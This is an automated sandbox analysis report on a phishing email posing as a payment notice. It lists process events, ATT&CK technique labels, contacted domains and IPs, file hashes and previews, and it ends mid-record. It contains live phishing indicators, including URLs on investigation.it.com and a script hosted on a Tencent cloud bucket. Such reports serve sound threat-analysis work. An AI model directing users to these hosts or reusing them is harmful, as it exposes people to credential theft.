      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation21
      Browser Extensions
      1
      Process Injection
      11
      Masquerading
      OS Credential Dumping1
      Process Discovery
      Remote ServicesData from Local System1
      Encrypted Channel
      Exfiltration Over Other Network MediumAbuse Accessibility Features
      CredentialsDomainsDefault AccountsScheduled Task/Job1
      DLL Side-Loading
      1
      DLL Side-Loading
      1
      Modify Registry
      LSASS Memory1
      File and Directory Discovery
      Remote Desktop ProtocolData from Removable Media3
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      Extra Window Memory Injection
      1
      Process Injection
      Security Account Manager13
      System Information Discovery
      SMB/Windows Admin SharesData from Network Shared Drive4
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      DLL Side-Loading
      NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture5
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      File Deletion
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      Extra Window Memory Injection
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      b10ad005.eml15%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/925700ed3c157cf4/1742828066068/9d3b3e9fdee7fbc9654555c56219c9953b3960b1aec63dbd0ce515de65e14e96/YqTRM7KYvQuxSRa0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1933918720:1742826586:M1neeQixT5o-O2WYep9BpiDi-N7t3T4n4M4Z0q0yLu8/925700ed3c157cf4/Aa8xZkLr7lODdm1227JieZvgJpZsFrHNls_7mFyimtU-1742828064-1.1.1.1-xV9DRF1xYkkl.mo8zEpuRWTpPhQxKs3HtQWnunCil66kHdy4FFORzmR1dP.zIHnw0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/d3y8w/0x4AAAAAABBl2YxAEq84JTEp/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/925700ed3c157cf4/1742828066067/2zTuo4ar0R_ZAnI0%Avira URL Cloudsafe
      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=925700ed3c157cf4&lang=auto0%Avira URL Cloudsafe
      https://esqj.investigation.it.com/google.php0%Avira URL Cloudsafe
      https://a.nel.cloudflare.com/report/v4?s=f28DQi4sSpNbUpJTcMM1kTyvh5IMLP%2Fd1R0Xtx9FAfAAMECYH%2FTsZSriddLNXk4MiS%2FZtfdLHyHbj56pzWaDMjY2IbqoNtGZXO%2FznOutpRsS6owfHl42VAW0NsDquGzpfS61686ALltAlBDL0%Avira URL Cloudsafe
      https://jsyk.investigation.it.com/favicon.ico0%Avira URL Cloudsafe
      https://6719074572-1317754460.cos.ap-tokyo.myqcloud.com/bootstrap.min.js0%Avira URL Cloudsafe
      NameIPActiveMaliciousAntivirus DetectionReputation
      mailmeteor.com
      172.67.187.19
      truefalse
        high
        stackpath.bootstrapcdn.com
        104.18.10.207
        truefalse
          high
          s-part-0012.t-0009.t-msedge.net
          13.107.246.40
          truefalse
            high
            a.nel.cloudflare.com
            35.190.80.1
            truefalse
              high
              e329293.dscd.akamaiedge.net
              23.209.72.9
              truefalse
                high
                maxcdn.bootstrapcdn.com
                104.18.11.207
                truefalse
                  high
                  esqj.investigation.it.com
                  104.21.70.101
                  truefalse
                    unknown
                    cos.ap-tokyo.myqcloud.com
                    43.128.240.50
                    truefalse
                      high
                      code.jquery.com
                      151.101.2.137
                      truefalse
                        high
                        cdnjs.cloudflare.com
                        104.17.24.14
                        truefalse
                          high
                          challenges.cloudflare.com
                          104.18.95.41
                          truefalse
                            high
                            resc.cloudinary.com.cdn.cloudflare.net
                            104.17.201.1
                            truefalse
                              high
                              www.google.com
                              142.250.72.100
                              truefalse
                                high
                                s-0005.dual-s-msedge.net
                                52.123.128.14
                                truefalse
                                  high
                                  jsyk.investigation.it.com
                                  104.21.70.101
                                  truetrue
                                    unknown
                                    res.cloudinary.com
                                    unknown
                                    unknownfalse
                                      high
                                      6719074572-1317754460.cos.ap-tokyo.myqcloud.com
                                      unknown
                                      unknownfalse
                                        unknown
                                        aadcdn.msftauth.net
                                        unknown
                                        unknownfalse
                                          high
                                          aadcdn.msauthimages.net
                                          unknown
                                          unknownfalse
                                            high
                                            NameMaliciousAntivirus DetectionReputation
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/d3y8w/0x4AAAAAABBl2YxAEq84JTEp/auto/fbE/new/normal/auto/false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1false
                                              high
                                              https://esqj.investigation.it.com/google.phpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                                                high
                                                https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/d/925700ed3c157cf4/1742828066067/2zTuo4ar0R_ZAnIfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://a.nel.cloudflare.com/report/v4?s=f28DQi4sSpNbUpJTcMM1kTyvh5IMLP%2Fd1R0Xtx9FAfAAMECYH%2FTsZSriddLNXk4MiS%2FZtfdLHyHbj56pzWaDMjY2IbqoNtGZXO%2FznOutpRsS6owfHl42VAW0NsDquGzpfS61686ALltAlBDLfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                                  high
                                                  https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                                    high
                                                    https://jsyk.investigation.it.com/favicon.icofalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/1933918720:1742826586:M1neeQixT5o-O2WYep9BpiDi-N7t3T4n4M4Z0q0yLu8/925700ed3c157cf4/Aa8xZkLr7lODdm1227JieZvgJpZsFrHNls_7mFyimtU-1742828064-1.1.1.1-xV9DRF1xYkkl.mo8zEpuRWTpPhQxKs3HtQWnunCil66kHdy4FFORzmR1dP.zIHnwfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svgfalse
                                                      high
                                                      https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                                        high
                                                        https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.jsfalse
                                                          high
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=925700ed3c157cf4&lang=autofalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/pat/925700ed3c157cf4/1742828066068/9d3b3e9fdee7fbc9654555c56219c9953b3960b1aec63dbd0ce515de65e14e96/YqTRM7KYvQuxSRafalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                                            high
                                                            https://res.cloudinary.com/dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.pngfalse
                                                              high
                                                              https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.pngfalse
                                                                high
                                                                https://6719074572-1317754460.cos.ap-tokyo.myqcloud.com/bootstrap.min.jsfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs
                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                104.18.10.207
                                                                stackpath.bootstrapcdn.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                13.107.246.40
                                                                s-part-0012.t-0009.t-msedge.netUnited States
                                                                8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                172.67.187.19
                                                                mailmeteor.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                104.21.70.101
                                                                esqj.investigation.it.comUnited States
                                                                13335CLOUDFLARENETUStrue
                                                                104.18.94.41
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                172.253.122.84
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.64.78
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                104.208.16.91
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                142.250.72.100
                                                                www.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                35.190.80.1
                                                                a.nel.cloudflare.comUnited States
                                                                15169GOOGLEUSfalse
                                                                23.209.72.31
                                                                unknownUnited States
                                                                20940AKAMAI-ASN1EUfalse
                                                                23.40.179.166
                                                                unknownUnited States
                                                                16625AKAMAI-ASUSfalse
                                                                52.109.20.38
                                                                unknownUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                142.250.80.35
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                104.17.24.14
                                                                cdnjs.cloudflare.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                142.250.80.14
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                23.209.72.9
                                                                e329293.dscd.akamaiedge.netUnited States
                                                                20940AKAMAI-ASN1EUfalse
                                                                1.1.1.1
                                                                unknownAustralia
                                                                13335CLOUDFLARENETUSfalse
                                                                172.67.222.215
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                43.128.240.50
                                                                cos.ap-tokyo.myqcloud.comJapan4249LILLY-ASUSfalse
                                                                104.18.95.41
                                                                challenges.cloudflare.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                52.123.128.14
                                                                s-0005.dual-s-msedge.netUnited States
                                                                8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                142.250.81.227
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                151.101.2.137
                                                                code.jquery.comUnited States
                                                                54113FASTLYUSfalse
                                                                104.18.11.207
                                                                maxcdn.bootstrapcdn.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                142.250.81.234
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                104.17.202.1
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                104.17.201.1
                                                                resc.cloudinary.com.cdn.cloudflare.netUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                IP
                                                                192.168.2.16
                                                                Joe Sandbox version:42.0.0 Malachite
                                                                Analysis ID:1647197
                                                                Start date and time:2025-03-24 15:52:40 +01:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:9
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • EGA enabled
                                                                Analysis Mode:stream
                                                                Analysis stop reason:Timeout
                                                                Sample name:b10ad005.eml
                                                                renamed because original name is a hash value
                                                                Original Sample Name:New payment scheduled for firstontario.com will arrive your bank in 2-3 business days ref 3c6b1059512ad4105ee797a7b10ad005.eml
                                                                Detection:MAL
                                                                Classification:mal88.phis.winEML@26/23@42/216
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .eml
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, conhost.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 52.109.20.38, 52.123.128.14
                                                                • Excluded domains from analysis (whitelisted): ecs.office.com, dual-s-0005-office.config.skype.com, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, us.configsvc1.live.com.akadns.net, scus-azsc-config.officeapps.live.com, officeclient.microsoft.com, ecs.office.trafficmanager.net
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtCreateFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                • VT rate limit hit for: esqj.investigation.it.com
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:modified
                                                                Size (bytes):102400
                                                                Entropy (8bit):4.50700043790922
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8DC93A13160F39201273A6751198BB85
                                                                SHA1:AE18D187A71C2B9728055D3587D735D9204F50FB
                                                                SHA-256:E6C14B01F4122FE3CA60060EC8782870D2D33DEC8326AC6490DC086FE8D4CE4F
                                                                SHA-512:72DEF9BF782C98A2466D0854BB849E16D63E659794C6C6ED1B614FBD3649217C75FAE2E6D78F43EA5D9E872D209F8D86EAE1E5C03A205843AA82B9A09DD5CBD1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:............................................................................`............H....................eJ..............Zb..2...................................,...@.t.z.r.e.s...d.l.l.,.-.1.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.1.1.1...............................................................6............H............v.2._.O.U.T.L.O.O.K.:.1.a.b.8.:.f.8.b.c.1.d.1.7.c.7.2.8.4.4.d.6.a.0.1.1.e.2.d.d.5.f.0.9.5.9.8.2...C.:.\.U.s.e.r.s.\.c.a.l.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.O.u.t.l.o.o.k. .L.o.g.g.i.n.g.\.O.U.T.L.O.O.K._.1.6._.0._.1.6.8.2.7._.2.0.1.3.0.-.2.0.2.5.0.3.2.4.T.1.0.5.3.4.4.0.4.8.4.-.6.8.4.0...e.t.l.......P.P..........H............................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                                Category:dropped
                                                                Size (bytes):16384
                                                                Entropy (8bit):0.3613836054883338
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:679672A5004E0AF50529F33DB5469699
                                                                SHA1:427A4EC3281C9C4FAEB47A22FFBE7CA3E928AFB0
                                                                SHA-256:205D000AA762F3A96AC3AD4B25D791B5F7FC8EFB9056B78F299F671A02B9FD21
                                                                SHA-512:F8615C5E5CF768A94E06961C7C8BEF99BEB43E004A882A4E384F5DD56E047CA59B963A59971F78DCF4C35D1BB92D3A9BC7055BFA3A0D597635DE1A9CE06A3476
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):512
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:Microsoft Outlook email folder (>=2003)
                                                                Category:dropped
                                                                Size (bytes):271360
                                                                Entropy (8bit):2.243918871979824
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FA889654FA6DB407EE0D6FB7946FA938
                                                                SHA1:558BA0004FD3C096AC876BE0E08C69C1633704BF
                                                                SHA-256:C40554D14D8790629C8DA94BE474D150060E980E9C0C9B5532201105337C7D01
                                                                SHA-512:F59A13BC80D4C6F10298218AB499A4751EA99BBAB1EFCAE090EDF50406D4412824C5528746FF9C5950444996F228A9742D8911DD657CBF51FBD2BAB2E41F6BB6
                                                                Malicious:true
                                                                Reputation:unknown
                                                                Preview:!BDN NV.SM......\.......@&..............Q................@...........@...@...................................@...........................................................................$.......D...............................>..................................................................................................................................................................................................................................................................................................8........ehY.i......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):131072
                                                                Entropy (8bit):2.882588509626979
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:11197439B93A8418A6E7E374826B37B1
                                                                SHA1:05528CDE9431729B61EDEE203294F6142FAAC649
                                                                SHA-256:2EC01A4F26580503DBE2E02FB6D53187BD868CA0506747D62EFB2F66489D4F9F
                                                                SHA-512:176EE23E3F59D264F1A49FFD13E4B0836246161F0B1C8C94A158D8D1B3719145ACDB7991185D07E5F227CEA4119E2706A0C99AD7A6984FE3423F54C83C76D704
                                                                Malicious:true
                                                                Reputation:unknown
                                                                Preview:.hSG0...~....................................#..................f..............].......................k........D..............................T...................................................................................................................................................................................................................................................................................................................................................................................................................z.=........4*.z0...........................f............#..........L.......................L.......................Z..........X............N.......................O.......................V......d...8............R......\.......$.......@P......\.......(........P......|.......,........Q......T...X...H........S......".......h.......@S......V................O......h................W......&................H..........@............H..........@...........
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):61
                                                                Entropy (8bit):3.990210155325004
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (48122)
                                                                Category:downloaded
                                                                Size (bytes):48123
                                                                Entropy (8bit):5.342998089666478
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EA38BDA3C117E2FE01BD862003357394
                                                                SHA1:767CCB3589E3067EE1B348DF2426A9E2E32CEE5C
                                                                SHA-256:719423C7B70AC911F76D00B3AE514D108A8315EA60A80519820BE50C0E4C96EF
                                                                SHA-512:F50FAB9DC2263F40216DF26C234AD390091F23185650E9B4E4748CF09CFEDF2D92A99FC81C986234580844393305AC2195E096DEDB64D9A25A99EF7BE510FFCA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/708f7a809116/api.js
                                                                Preview:"use strict";(function(){function jt(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){jt(l,o,c,v,h,"next",s)}function h(s){jt(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (50758)
                                                                Category:downloaded
                                                                Size (bytes):51039
                                                                Entropy (8bit):5.247253437401007
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:67176C242E1BDC20603C878DEE836DF3
                                                                SHA1:27A71B00383D61EF3C489326B3564D698FC1227C
                                                                SHA-256:56C12A125B021D21A69E61D7190CEFA168D6C28CE715265CEA1B3B0112D169C4
